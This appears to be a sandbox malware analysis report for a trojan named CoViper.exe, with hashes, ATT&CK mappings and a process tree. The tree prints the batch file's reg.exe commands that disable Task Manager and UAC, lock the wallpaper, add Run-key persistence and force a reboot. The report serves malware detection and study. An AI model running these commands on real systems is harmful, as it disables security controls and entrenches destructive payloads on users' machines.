eadaf26df948f0fd541f297e2f0bad435aa4bee5c97e4324ad767dacca77e29d

max time kernel
42s
max time network
131s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
09-05-2023 19:14

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

trojan-leaks-main/CoViper.exe
Size

286KB
MD5

e20ee9bbbd1ebe131f973fe3706ca799
SHA1

4e92e5cbe9092f94b4f4951893b5d9ca304d292c
SHA256

f632b6e822d69fb54b41f83a357ff65d8bfc67bc3e304e88bf4d9f0c4aedc224
SHA512

d50524992662aa84d5b4340525a25d915e91e464a725aa6851de206fd294aa7f4fcefe695ce463ce652b0a03874b75c0678b4c708d2b71f7c18804d1365d3458
SSDEEP

6144:egtJZ0NSt7Jb/Is8vIfYg6KcZQV7GdRMrKUIvcgfoS3Qz89r:egWNStd7R8cYgsZK7qCrqfoS3Mcr

Score

10^/10

evasion persistence trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Disables Task Manager via registry modification
evasion

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral6/memory/1780-133-0x0000000000400000-0x0000000000473000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\run.exe	upx
behavioral6/memory/1780-155-0x0000000000400000-0x0000000000473000-memory.dmp	upx

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\GoodbyePC! = "C:\\COVID-19\\end.exe"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CheckForUpdates = "C:\\COVID-19\\Update.vbs"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\COVID-19\\run.exe"	reg.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "15"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe

Modifies registry key 1 TTPs 10 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

3780 reg.exe
4432 reg.exe
4724 reg.exe
3936 reg.exe
4008 reg.exe
3100 reg.exe
4116 reg.exe
4868 reg.exe
1452 reg.exe
2876 reg.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

shutdown.exe

description pid process

Token: SeShutdownPrivilege 4756 shutdown.exe
Token: SeRemoteShutdownPrivilege 4756 shutdown.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

LogonUI.exe

pid process

1344 LogonUI.exe

pid	process
3780	reg.exe
4432	reg.exe
4724	reg.exe
3936	reg.exe
4008	reg.exe
3100	reg.exe
4116	reg.exe
4868	reg.exe
1452	reg.exe
2876	reg.exe

description	pid	process
Token: SeShutdownPrivilege	4756	shutdown.exe
Token: SeRemoteShutdownPrivilege	4756	shutdown.exe

pid	process
1344	LogonUI.exe

Suspicious use of WriteProcessMemory 39 IoCs

Processes:

CoViper.execmd.exe

description	pid	process	target process
PID 1780 wrote to memory of 2084	1780	CoViper.exe	cmd.exe
PID 1780 wrote to memory of 2084	1780	CoViper.exe	cmd.exe
PID 1780 wrote to memory of 2084	1780	CoViper.exe	cmd.exe
PID 2084 wrote to memory of 3664	2084	cmd.exe	attrib.exe
PID 2084 wrote to memory of 3664	2084	cmd.exe	attrib.exe
PID 2084 wrote to memory of 3664	2084	cmd.exe	attrib.exe
PID 2084 wrote to memory of 3100	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 3100	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 3100	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4116	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4116	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4116	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4868	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4868	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4868	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 3780	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 3780	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 3780	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 1452	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 1452	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 1452	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4432	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4432	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4432	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4724	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4724	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4724	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 3936	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 3936	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 3936	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 2876	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 2876	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 2876	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4008	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4008	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4008	2084	cmd.exe	reg.exe
PID 2084 wrote to memory of 4756	2084	cmd.exe	shutdown.exe
PID 2084 wrote to memory of 4756	2084	cmd.exe	shutdown.exe
PID 2084 wrote to memory of 4756	2084	cmd.exe	shutdown.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

3664 attrib.exe

pid	process
3664	attrib.exe

C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\CoViper.exe
"C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\CoViper.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\76E1.tmp\coronavirus.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\Windows\SysWOW64\attrib.exe
    attrib +H C:\COVID-19
    3⤵
    - Views/modifies file attributes
    PID:3664
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v disabletaskmgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3100
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:4116
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v wallpaper /t REG_SZ /d C:\COVID-19\wallpaper.jpg /f
    3⤵
    - Modifies registry key
    PID:4868
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3780
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\Control Panel\Cursors /v Arrow /t REG_SZ /d C:\COVID-19\cursor.cur /f
    3⤵
    - Modifies registry key
    PID:1452
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\Control Panel\Cursors /v AppStarting /t REG_SZ /d C:\COVID-19\cursor.cur /f
    3⤵
    - Modifies registry key
    PID:4432
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\Control Panel\Cursors /v Hand /t REG_SZ /d C:\COVID-19\cursor.cur /f
    3⤵
    - Modifies registry key
    PID:4724
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v CheckForUpdates /t REG_SZ /d C:\COVID-19\Update.vbs /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:3936
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.exe /t REG_SZ /d C:\COVID-19\run.exe /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:2876
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\software\Microsoft\Windows\CurrentVersion\Run /v GoodbyePC! /t REG_SZ /d C:\COVID-19\end.exe /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:4008
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown -r -t 5
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4756

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3984855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1344

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\76E1.tmp\coronavirus.bat

Filesize
1KB

MD5
e9b2f5e9305dc2a39258d69264647c53

SHA1
87653e2ba1bf810feb472391cef4ffae82e38ea9

SHA256
4fd9b85eec0b49548c462acb9ec831a0728c0ef9e3de70e772755834e38aa3b3

SHA512
7b0ff3dde5ba6d098f970a8d09c690652607cb3f8806b942922f7b92df45b4cc788f13dd376b6d48404178a5462baddafbb61b893074b42dbf14836826af9881

Download Submit
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\Update.vbs

Filesize
156B

MD5
bfbafdf20dadf4e83476228f2f86e80c

SHA1
fcc31feb12f3ccd786b17d46c5f487c22ea74a38

SHA256
a1a8d79508173cf16353e31a236d4a211bdcedef53791acce3cfba600b51aaec

SHA512
157ba2aaa5bd715119381a593ec78ac83f2e2e35512764ec99878cd4019d87837bb96457cb2de5e64df1510cf2935aa91918c27e686a2451c095bbbaedc84321

Download Submit
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\cursor.cur

Filesize
13KB

MD5
21f48a9e113317b8e2b3ce5366621aa1

SHA1
674c0fc07675d3455780690c38f25f6fbd20b401

SHA256
13c4423ed872e71990e703a21174847ab58dec49501b186709b77b772ceeab52

SHA512
50b99a9e44b3fefce32ad729048d8491cfa403425efe84c48038ab97dbdb403fbe35dfd50a82018d180144e1c84243622f45a2b11a06e6f105f13636fff7d75b

Download Submit
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\end.exe

Filesize
47KB

MD5
7def1c942eea4c2024164cd5b7970ec8

SHA1
b2f4288577bf8f8f06a487b17163d74ebe46ab43

SHA256
c3f11936fe43d62982160a876cc000f906cb34bb589f4e76e54d0a5589b2fdb9

SHA512
87b023b8550fcb7b7948b33eb76dd8e22452669fba280b384bc2c2162d908eaa95cdac3f31136bc2aed07944cebdc22bce34f2a96ce4f40353645f5a2a94f5ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\mainWindow.exe

Filesize
148KB

MD5
e6ccc960ae38768664e8cf40c74a9902

SHA1
d29cbc92744db7dc5bb8b7a8de6e3fa2c75b9dcd

SHA256
b780e24e14885c6ab836aae84747aa0d975017f5fc5b7f031d51c7469793eabe

SHA512
a3a7fa630bafa9508b78af298893733b365e4a185a47b231fb0bfdffc4ed2adacbdbc65fd8261cdd8a589998590a82416cb21200e0eed1bcef67b7655c9b101d

Download Submit
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\run.exe

Filesize
21KB

MD5
b1349ca048b6b09f2b8224367fda4950

SHA1
44fac7dd4b9b1ccc61af4859c8104dd507e82e2d

SHA256
c46c3d2bea1e42b628d6988063d247918f3f8b69b5a1c376028a2a0cadd53986

SHA512
f1cc8116d6eb91e6ecb214ac647c7a9a4ca7d2733af3bbca68939722c11e61a33213aa8c1cc6024c0f186db9edca48006f8f13d3282c7be921b3246cba975810

Download Submit
C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\wallpaper.jpg

Filesize
1KB

MD5
087f4545e13bd7b8e1f36c941a62f8a4

SHA1
f43ac7023ca49efe5509993667f04c2fbf6ac722

SHA256
4a17f58a8bf2b26ece23b4d553d46b72e0cda5e8668458a80ce8fe4e6d90c42d

SHA512
8b309437fb43ce8667ead9709fd5700b719ee46bd294c4ee4b554cd064de63b3d5165bac83e349c54491a97c8f2241dc29f92f586c5ef50689b681386dc07c31

Download Submit
memory/1780-133-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/1780-155-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads